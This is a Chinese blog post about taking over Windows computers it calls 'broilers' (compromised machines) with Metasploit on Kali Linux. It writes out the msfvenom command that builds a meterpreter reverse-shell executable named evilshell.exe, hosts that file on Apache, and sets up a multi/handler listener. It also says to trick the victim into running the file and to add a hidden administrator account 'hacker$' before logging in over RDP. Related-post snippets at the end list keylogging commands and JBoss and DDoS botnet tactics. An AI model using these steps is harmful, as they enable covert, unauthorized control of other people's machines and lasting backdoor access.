kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统

最新推荐文章于 2024-03-05 18:16:42 发布
最新推荐文章于 2024-03-05 18:16:42 发布
阅读量3.1k 收藏 60
点赞数 3
文章标签: kali linux捉肉鸡教程

一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。

其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。

二、步骤:

Step1:生成木马,msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe

-p 参数后跟上payload,攻击成功后要做什么事情

lhost 后跟监听的IP

lpost 后跟监听端口

-f 后跟要生成后门文件的类型

>重定向

Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。

cp evilshell.exe /var/www/html/

service apache2 start

Step3:开启MSF,提前查看postgresql运行状态 msfconsole

ps -aux |grep postgresql

msfconsole

exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具

payload:载荷载体,攻击成功后要操作什么

输入以下命令

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(选择木马时选的payload)

msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost kali的IP

msf5 exploit(multi/handler) > set lpost 5555

msf5 exploit(multi/handler) > run(或者exploit)

Step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在Kali中就会得到肉鸡的shell(meterpreter)

msf5 exploit(multi/handler) > run

Step5:现在就可以给肉鸡添加用户了

net user

net user hacker$ /add

net user hacker$ 123.com

net localgroup administrators hacker$ /add 添加到管理员组

net user hacker$

Step6:远程登录肉鸡计算机

rdesktop + windows的IP

至此,使用Kali控制Windows成功!

秋雨随云
关注
  • 3
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux公网渗透抓鸡实验
weixin_44162346的博客
08-31 3059
收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息,最重要的之一便是肉鸡的网络环境。 实验环境 首先介绍下本次测试的服务器环境: 攻击机Mac:110.xx.xx.xx 外网 肉鸡centos:192.168.16.x 目标内网16网段系统 内网渗透范围:192.168.17.0/24 目标内网17网段系统 本次测试模拟假设:由...
kali linux肉鸡教程,简单扫4899端口肉鸡菜鸟教程详细版
weixin_29513805的博客
05-02 2990
简单扫4899端口肉鸡 (菜鸟教程详细版)大家好。我是☆黑色毛衣☆。今天做的是简单扫4899端口肉鸡,只要把工具用好。找端口肉鸡不难可能有些扫135端口的扫描不了。这样就试试4899吧。因为扫135端口有些地方限制了。所以扫描不了。好了,话不多打。我们今次用到的工具有:1.S扫描器 (端口扫描器)2.4899过滤器 (过滤4899端口空密码主机专用)3.radmin (一个远程控制软件)4.免...
谁可以教我抓鸡
asdads1561123的专栏
03-16 528
<br />谁可以教我抓鸡
Msfconsole详细教程
最新发布
weixin_65582330的博客
03-05 1582
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
kali 肉鸡的操作
qq_33391644的博客
02-08 6249
1.屏幕截图命令:screenshot 2.键盘记录命令:keyscan_start   //开启 keyscan_dump //显示键盘记录keyscan_stop //关闭键盘记录3.结束进程命令:Kill 进程4.查看进程命令:ps5.重启电脑命令:Reboot6.关闭电脑命令:Shutdown7.获取电脑信息命令:sysinfo8.音频录音命令:record_mic -d 秒数9.打开窗体...
什么是DDoS攻击?
yourgeek的博客
02-27 336
本文转载自知道创宇云安全的知乎回答:DDoS 的肉鸡都是哪来的? 说到DDoS攻击,我们就不得不说“肉鸡”。 “肉鸡”可谓是DDoS攻击的核心大杀器,作为一个要发起DDoS攻击的黑客来说,没有肉鸡就是没有枪,裸奔不好使的。 放眼肉鸡江湖,来源各异,品种丰富。攻击者没点套路怎么当“鸡主”?况且搞个鸡,那都是小菜一碟。 肉鸡哪儿来? 养鸡、买鸡、抓鸡那都是司空见惯的,做为一个资深的搞鸡专业户,社会这...
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 3797
002-windowa基础(DOS命令:net user 用户 密码 /add)
利用JBOSS漏洞抓肉鸡
404
01-23 7002
JBOSS是间件,解析JSP的文件,由于间件爆发漏洞一般很少人打补丁,这次我们利用jboss漏洞抓肉鸡。 利用工具:jexboss-master 这个工具是Python写的在我的资源里面已经分享可以下载,也可以自己在github上面寻找 网络搜索引擎:zoomeye(钟馗之眼) 在抓肉鸡之前我们要明白目标,那就是使用jboss间件的服务器 进入zoomeye搜索关键词jboss(这
linux肉鸡入侵详细教程,Linux XOR.DDoS入侵排查步骤 | 聂扬帆博客
weixin_39553653的博客
05-02 969
0x00 病毒详情XOR.DDoS类型病毒主要特点,用暴力猜解目标机器ssh弱密码的方式,入侵目标机器,然后执行相应的shell脚本,安装病毒到目标机器,将目标机器变为DDoS肉鸡,然后病毒利用多线程发起DDoS攻击。0x01 排查步骤1、登录机器安装clamav进行病毒扫描#安装$yum install -y epel-release$ yum install -y clamav#更新病毒库$...
kali linux 安装 NVIDA 显卡驱动教程
01-20
现在互联网上一堆在 kali Linux 上安装 NVDIA 显卡驱动的教程,但是很多都是你抄我,我抄你,都没有去实际的验证,导致很多小伙伴照着这些教程安装后要么没有成功,要么 kali Linux 直接启动不了了。而我开始怀疑写这些博客或者教程的人,他们有自己亲自验证过教程的可用性吗? 我自己就是被类似的教程坑了,所以在装 NVDIA 显卡这件事上费了不少功夫,光重装系统就不下 20 次。还好我最终总结除了必然成功的方法,经得住大家的考验的方法。如果你按照我的方法成功安装了 NVDIA 显卡驱动的话,你的关注就是我最大的动力,我会继续亲自实验,写出更好的教程哦。好了,下面进入正题。 物理机安
Kali Linux系统使用基础教程v1.0
11-03
Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。它支持32位和64位硬件。Linux继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
最新超详细虚拟机VMware安装Kali Linux的图文教程
01-09
准备:一台电脑,VMware(VMware安装教程) 一、下载系统镜像文件 1.首先下载系统镜像,进入kali官网,在Downloads选择Download Kali Linux,如下图所示。 2.根据电脑配置选择合适的版本,在这里我选择的是64位版本,点击HTTP下载镜像文件。 二、创建新的虚拟机 1.打开VMware Workstation,创建新的虚拟机,我们使用自定义的配置方法。 2.导入系统镜像文件。 3.选择客户机操作系统及版本。 4.输入虚拟机的名称和安装位置。 5.点击下一步直至出现以下界面。为虚拟机分配内存,建议不要超过提示的最大推荐内存,这里分配2GB。 6
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
KaliLinux安全渗透教程(完整版)
04-26
6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 ...
Kali Linux NetHunter基础教程.pdf
12-02
Kali Linux NetHunter 是一款基于 Android 设备构建的渗透测试平台。包括一些特殊和独特的功能。 NetHunter 支持无线 802.11 注入、一键 MANA AP 搭建
使用kali-linuxMetasploit Framework接入互联网的使用教程
12-29
使用kali-linuxMetasploit Framework接入互联网的使用教程
kali linux肉鸡教程
10-27
Kali Linux肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将木马程序安装到目标计算机上。 3. 在Kali Linux使用msfconsole工具,设置监听器,等待目标计算机连接。 4. 一旦目标计算机连接到监听器,攻击者就可以获得对该计算机的控制权,并执行各种操作,例如窃取敏感信息、安装其他恶意软件等。 具体来说,以下是一些可能的步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用社会工程学攻击技术,向目标计算机发送诱骗邮件或信息,诱导用户点击恶意链接或下载恶意文件。 3. 一旦用户点击链接或下载文件,木马程序就会被安装到目标计算机上。 4. 在Kali Linux使用msfvenom工具生成木马程序,并将其命名为evilshell.exe。 5. 将生成木马文件拷贝到/var/www/html目录下,并开启apache服务。 6. 在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。 7. 一旦用户运行木马程序,攻击者就可以获得对该计算机的控制权,并执行各种操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值